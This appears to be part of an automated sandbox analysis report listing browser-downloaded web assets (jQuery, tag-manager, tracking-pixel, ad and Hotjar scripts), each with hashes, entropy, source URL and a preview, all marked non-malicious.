                                                                                                                                                                                                                                                                                                                                                                          SHA-256:160A426FF2894252CD7CEBBDD6D6B7DA8FCD319C65B70468F10B6690C45D02EF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F8DA8F95B6ED33542A88AF19028E18AE3D9CE25350A06BFC3FBF433ED2B38FEFA5E639CDDFDAC703FC6CAA7F3313D974B92A3168276B3A016CEB28F27DB0714A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, original size modulo 2^32 26516
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):10006
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.972403776947168
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:EctMuAWs1ilwUOinYsBR2VVb9DwBXj4NvPTfiuZGUJ9roqRrfsqTY:EGHlCsBR2Dg8Nvr6uZGUEifJTY
                                                                                                                                                                                                                                                                                                                                                                          MD5:636B6ED4F27E73B2552E78143432789A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:FBE51C1AC59D2759D4B46952FA6876DC4F8C5766
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E895B289F668FAA8AB8D69B2C0E1926EF4004DD3D63E506AE813801968CF9C06
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C19D07F286CA767324770CCBE6B2CAFB3B68EC2393C112494BE9135F82B755698E9FAF0EAC450AF1620DA861BEADBCC45B8CFB8D88660647073FFF34B4A34943
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:...........{{..8...U..BEl..U2q..I.$..]E.*2N..HF.ib...< .s..g.<.<....Gc.f.a.......2........C..t6..c6..z.UP.g......'.N!..m...^....z..c..xV.C..8..s.b.B.U.W>...S.}6........;.....s,>.{v.F.dU.0..|.........W............W:]......"^...W\.....W....o..8.|.~...{.....u..Q.Uu*..9.Uu.T..Yx...D.....5.H...G..,.$8.....c}.>M.....2]..y1....z%..L.YU2..U.P=QJ..M%..A}#.......;..........5.z.Z.E.O..{....&.......^}.@R.k..0.../.p.*....V;<...Ar.we.A2..`..[0n'.....*6.wG..Y.s.r.~z7.V.?4;g.."x..Y2.7.}."d...Ks.N..}.T.hz..qs[....K}/b.U.Q.:Q:R...;.l.{r&.do........R1''.Q..Q..S._.yry........r.>.z....@..o.t..z:N.....S..sQ.*5.+A.W^.'A2.....i|...n...J......V...w.-..z}@6...yN....7*p..Qw..i}.^.+.....n+gP.[....{^m..\...?W.'W..Y.J.`......Xa.3.O.......V.....NL...|.c..hQ..P....q.....]..Ix.......7....*..o\&l..W.....__.%_-.$|6>.L..+.._..;...X....:}H.V4m.....LqX9..d..??...........7.0...D=,.Z...30..L:..!....,.......{...8..j...`s..~9..vZlr.#.........ir ....U..l......."
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                                                          MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://px.ads.linkedin.com/attribution_trigger?pid=48411&time=1728903365197&url=https%3A%2F%2Fget.managedmethods.com%2Fcloud-application-security-checklist
                                                                                                                                                                                                                                                                                                                                                                          Preview:{}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65451)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):86927
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.289226719276158
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:jLiBdiaWLOczCmZx6+VWuGzQNOzdn6x2RZd9SEnk9HB96c9Yo/NWLbVj3kC6t3:5kn6x2xe9NK6nC69
                                                                                                                                                                                                                                                                                                                                                                          MD5:A09E13EE94D51C524B7E2A728C7D4039
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0DC32DB4AA9C5F03F3B38C47D883DBD4FED13AAE
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:160A426FF2894252CD7CEBBDD6D6B7DA8FCD319C65B70468F10B6690C45D02EF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F8DA8F95B6ED33542A88AF19028E18AE3D9CE25350A06BFC3FBF433ED2B38FEFA5E639CDDFDAC703FC6CAA7F3313D974B92A3168276B3A016CEB28F27DB0714A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4201)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):286636
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.546164776516344
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:2J+H1CEOFp7m8q0I6oI1Lirsic5e+q+qP9p6i1xcQLT+AW:a8OF1mIO5W8+qTB1xcQLTJW
                                                                                                                                                                                                                                                                                                                                                                          MD5:7B5F0CF071B1B1A8A66410EF1ABA99C4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:91D24618A4D03B5E64BCE5450C1DE6FE3D455D2B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:1757316A36EEC66BBED97D5515F88C4BD7E6B5CE7A10C94D5D1ADB449AFE25E5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8AA2EF8F93738A4332149D8EA293F45BC5945D9B779AE694D085925E768E104F79AADBBDBBC3D5EC0785D617E7371F958050291F9BF4F89C56CA13EA0AC7245F
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":18,"vtp_instanceDestinationId":"AW-927141988","tag_id":13},{"function":"__ogt_1p_data_v2","priority":8,"vtp_isAutoEnabled":true,"vtp_isManualEnabled":false,"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAdd
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://alb.reddit.com/rp.gif?ts=1728903365250&id=a2_dy5o8mn2d6oc&event=PageVisit&m.itemCount=undefined&m.value=&m.valueDecimal=undefined&m.currency=undefined&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=631133ec-3227-461f-8a3a-bfa5fb517d3d&aaid=&em=&external_id=&idfa=&integration=gtm&opt_out=0&sh=1280&sw=1024&v=rdt_5afed25b&dpm=&dpcc=&dprc=
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, original size modulo 2^32 24732
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):9706
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.974244330200313
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:sdfLzIYp/TqA9pWKOtmld+fBOApnSbGbZAsCQSu98xpZi2:sdffIeecIKameOsnSbeCsCu98xpM2
                                                                                                                                                                                                                                                                                                                                                                          MD5:373CEF3A03E2AAB544B1645A96E1557D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:789BB2E7E291CE40587D62BDB821934E0F7B736D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A9DCEB91B28EDD0CE446F678E2117ECE68191D4C2E609B07F4910D2F93F58226
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9DF97EEAC20A806BDDAAC955EA39554040D9B5A38A5C7432C4BC0347FFB4C8C14F1E923082D9B227D6421996AEE238B0A027038FBDC381EA3365616544B94388
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://t.sharethis.com/1.1523.23404/a/US/t_.js?cid=c010&cls=C
                                                                                                                                                                                                                                                                                                                                                                          Preview:...........m[.8.0.......+."..^mD.R..@y...Q.m".YIKq...5..8.t..=.9...C.i43..H..,y..Z.-.n,..5{I.....g....Z....if26..@...... _..Y..]..z/...Kk.W..I.....Y;.`PG.[k.J...G.%&"........mG.\..>.TZ;...K.|.d.X^v/.5K.Nj......$...{d.Y.....EY.K}0.._...f.e..!.....5..:...O.H..@p.#...{k..O...w.....:.lZ.U.@..3J./w.......1....[k...66-.,.U.vn.u...bg...uuyn.X#.&.....IW..k/jnVS.&.o...t].{Y.'{...&.........u..h2~...e...;..M.J.U...4.Sj.Y.G...=.......h.....\.....i..O..g~`.X.u.........*..>...........U.u.I._}:..xXr..7|....Q=.x.s P.....yG^08..#..'kg....U.......N..Z.<w..3.._..O..]r{.&..._...u.U.to"j.^....oA.4....g..g..2.f..Q&uW^.....D.z.....}.o}gm.V...Y.........._76......D.G....b..n.%z..k;.......?.$.D.....:[..:...a.....fk{[........}k....zv...........?.d>...Xcn...|....^i..k.............n.Y.G.8..9<>..f......a.<.......Ok.:...'K.f...c(8....%<....<........6.<....B..x...3..L.:..3...(...9.6..;....Z.>...j.........A..uz...8>.}..............@....O......H>A..`...p....d....4M..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (786)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1672
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.286735414643417
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:bFj15yMuJcZ2E9uIic2u8aYlPFs3l7Q2xtHS:Fey2EYIic2u8bl9sJu
                                                                                                                                                                                                                                                                                                                                                                          MD5:AB304529064B2C30C88FC41AD81913E0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:14091E21A049D97B052DD56FF4076898F6F7D0CC
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:88C5A7E6C9B3319F4BE9CD873D1E19766A62BE628EA9921156DD2702F1D15031
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6F8A7C3D2516C88E172D6AF1F88B0F32242A737BA128F95E0668D57EE004384DAFE4011A84FC543BA477A7BC82A8D47862F1F276F0C89FA0087D63E4D3B72691
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){'use strict';let e=[];const f=()=>{const a=e;e=[];for(const b of a)try{b()}catch{}};function g(a=document){return a.createElement("img")};function h(a=null){return a&&a.getAttribute("data-jc")==="26"?a:document.querySelector('[data-jc="26"]')};var k=document;/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=()=>{var a=k.querySelectorAll("link[data-reload-stylesheet][as=style][rel=preload]");for(var b=0;b<a.length;b++){var c=a[b],d="link",l=document;d=String(d);l.contentType==="application/xhtml+xml"&&(d=d.toLowerCase());d=l.createElement(d);d.setAttribute("rel","stylesheet");d.setAttribute("href",c.getAttribute("href"));k.head.appendChild(d)}if(a.length>0&&!(Math.random()>.01)){a=(a=h(document.currentScript))&&a.getAttribute("data-jc-rcd")==="true"?"pagead2.googlesyndication-cn.com":"pagead2.googlesyndication.com"; .b=(b=h(document.currentScript))&&b.getAttribute("data-jc-version")||"unknown";a=`https://${a}/pagead/gen_204?id=jca
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://sync.sharethis.com/eyeota?uid=2vSdg0G_wj1oSR5uhhmamgKTQUQPGWo6UXUC2ilh8T3A&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65450)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):229896
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3790254996258575
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:2wmvBwvwtVMwe+s7D1pTT5OFm7eTX03LDLDbGw5waPKfFsexuvaIGG4xQrZBYGCT:yBwvwtVMww1LOFwnFIFs8Ch4yt7bScYZ
                                                                                                                                                                                                                                                                                                                                                                          MD5:6C9DAAE162B99972141F49C4ACB16E6C
                                                                                                                                                                                                                                                                                                                                                                          SHA1:68F82CFC907AF79CC3A9AA0DD9A33B14C48894EB
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3C6FD07134C7C19A53B6119D41D6C250EFAE68F3E7384AE34971E63B21D01337
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F370FB2CCEFAA89B7C897C3ED7FF3C1072D1089AAECA04D56B23EEAA5A864828A02639B51EFE33182030FF756E0BF123A13C9D51F635B1975FE46F60885588FA
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://script.hotjar.com/modules.02161fb4f8ebb73fb3f8.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:/*! For license information please see modules.02161fb4f8ebb73fb3f8.js.LICENSE.txt */.!function(){var e={4788:function(e,t,n){"use strict";n.d(t,{s:function(){return r}});const r=Object.freeze({IDENTIFY_USER:"identify_user",AUTOTAG_RECORDING:"autotag_recording",TAG_RECORDING:"tag_recording",HEATMAP_HELO:"heatmap_helo",RECORDING_HELO:"recording_helo",REPORT_USER_ID:"report_user_id",MUTATION:"mutation",MOUSE_CLICK:"mouse_click",INPUT_CHOICE_CHANGE:"input_choice_change",KEY_PRESS:"key_press",MOUSE_MOVE:"mouse_move",RELATIVE_MOUSE_MOVE:"relative_mouse_move",CLIPBOARD:"clipboard",PAGE_VISIBILITY:"page_visibility",SCROLL_REACH:"scroll_reach",SCROLL:"scroll",SELECT_CHANGE:"select_change",VIEWPORT_RESIZE:"viewport_resize",SCRIPT_PERFORMANCE:"script_performance",REPORT_CONTENT:"report_content",INSERTED_RULE:"inserted_rule",DELETED_RULE:"deleted_rule"})},6939:function(e,t,n){"use strict";n.d(t,{f:function(){return f},W:function(){return g}});const r=Object.freeze({LIVE:"LIVE",REVIEW_WEBAPP:"REVI
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):125679
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.092480503528483
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:TY7QzNXNb+2bE3MWBSQ3UMQyfyFA1WdbcwcYVuUOC5xwnVUQUrYbP:TLzN9/Y8WBQMj6F5d6LL
                                                                                                                                                                                                                                                                                                                                                                          MD5:5731ACC277B353D0DC39843B0B7B1F13
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3638D8709BD9B411AB7F5B09DAE799466B4D40D7
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0A8EC19F1A3416E577480F43EA08BD33DB6F1A8768CA8018FC05ECC229CD543C
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:506173D9F3D890CD383891C0DBE874A1047145731A8E5F7EC883755DBE5736448D5988B909065477665585E01D2C54B2707B01C2C1AAEA2B8B946BCAF8CE3FAF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2542884292174911&output=html&h=250&slotname=3704632056&adk=1080356790&adf=1713894358&pi=t.ma~as.3704632056&w=300&abgtt=3&lmt=1728897154&format=300x250&url=https%3A%2F%2Fald.my.id%2F&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzQiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTM0Il0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzQiXV0sMF0.&dt=1728897152711&bpp=36&bdt=1799&idt=1960&shv=r20241009&mjsv=m202410080101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=243x600&correlator=2303771533125&frm=20&pv=1&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=525&ady=100&biw=1280&bih=907&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C44759842%2C95338737%2C44798934%2C95343454%2C95344778&oid=2&pvsid=3856392468538169&tmod=1611993855&uas=0&nvt=2&ref=https%3A%2F%2Fald.my.id%2F&fc=896&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7CfeE%7C&abl=CF&pfx=0&fu=0&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=2&uci=a!2&fsb=1&dtd=2199
                                                                                                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html><html lang=en><head><meta charset="UTF-8"><script>var jscVersion = 'r20241009';</script><script>var google_casm=[];</script><style>HTML,BODY{height:100%;width:100%;margin:0;padding:0;overflow:hidden;}#mys-wrapper{height: 100%;width:100%;overflow:hidden;position: absolute;top:0;left:0;align-items: center;display:flex;justify-content:center;line-height:normal;}#mys-overlay{height:100%;width:100%;overflow:hidden;position:absolute;top:0;left:0;box-sizing:border-box;pointer-events:none;z-index:1;display:none;}.mys-wrapper A,.mys-wrapper A:visited,.mys-wrapper A:hover,.mys-wrapper A:active{color:inherit;cursor:pointer;text-decoration:inherit;}[dir=rtl] .flip-on-rtl{transform:scale(-1,1);transform-origin:center;}#mys-content{flex-shrink:0;position:relative;overflow:hidden;z-index:0;}</style><style data-nl="square" data-ns="ns-iq3k9" x-phase="assemble">.ns-iq3k9-l-square{opacity:.01;position:absolute;top:0;left:0;display:block;width:300px;height:250px;}.ns-iq3k9-e-0{flex-shrink:
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):9466
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.305339925834115
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:ERExfCmX69z0Ap4ev/OusA0Upjj7pGOW3:rOz3CciCxW3
                                                                                                                                                                                                                                                                                                                                                                          MD5:D23265E54DA7D7F717359E80F51D9BC0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:42E91BA72FE8E03602707FC6320B8208FD1618F0
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:7F16609EA117B889C85C52F544A46454D5095F521C199EA3DDEBEAC8BC7E4556
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D51DE4740991648D5183E062B65E16B516FA05FBF2D61D1D6FFBE655A02264ADBA2EC505F50564F5D789FFDD0AB62A2F6AF62CE2405A3ECF3D75128F3448FF8B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:[{"owner":"https://x.adroll.com","trustedBiddingSignalsURL":"https://x.adroll.com/kv/v1/getvalues","name":"prospecting","biddingLogicURL":"https://x.adroll.com/bid/bidding-logic.js","biddingWasmHelperURL":"https://x.adroll.com/bid/bidding-logic.wasm","trustedBiddingSignalsKeys":["pbBeXy","p5Z-wu","pLNIlP","pRppoo","pn8Jc2","p_Qudm","pD4Cge","timestamp"],"updateURL":"https://x.adroll.com/update/prospecting/TSSSGOL6MBFETCAHMJBJCQ?p=BQE3hISx8OeQl1OC5vwSjCPSAAAAAQAILnshAPx8wRnO_HzBGc4","ads":[{"renderURL":"https://x.adroll.com/ads/uuawmZ1IYg","metadata":"51dbZ728x90"},{"renderURL":"https://x.adroll.com/ads/HYS1PjJCg0","metadata":"51dbZ728x90"},{"renderURL":"https://x.adroll.com/ads/ay9epohl3M","metadata":"51dbZ728x90"},{"renderURL":"https://x.adroll.com/ads/mgJlTPTl0D","metadata":"51dbZ320x50"},{"renderURL":"https://x.adroll.com/ads/ss8SH2JThE","metadata":"51dbZ320x50"},{"renderURL":"https://x.adroll.com/ads/CKCqdoX4jU","metadata":"51dbZ320x50"},{"renderURL":"https://x.adroll.com/ads/pj3ec
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):20403
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.489624742526702
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:S7bi777i7m3N7y7+g7Mb5e5m3sp+r3bGRGm3X2+AKb7I7m3qr+ptbQTQm3NA+2oJ:S/ineoNGrolVOX/lAzJdqHjN89
                                                                                                                                                                                                                                                                                                                                                                          MD5:BFA0D53D62C9885E34D65CD22BC6F7ED
                                                                                                                                                                                                                                                                                                                                                                          SHA1:10E62DE7C24338EA8F838748923F51D667DAA77F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:24CC34683322F4F71E5EF95E755BFA177FE166094FFD36EBB174C7DBFF9A7037
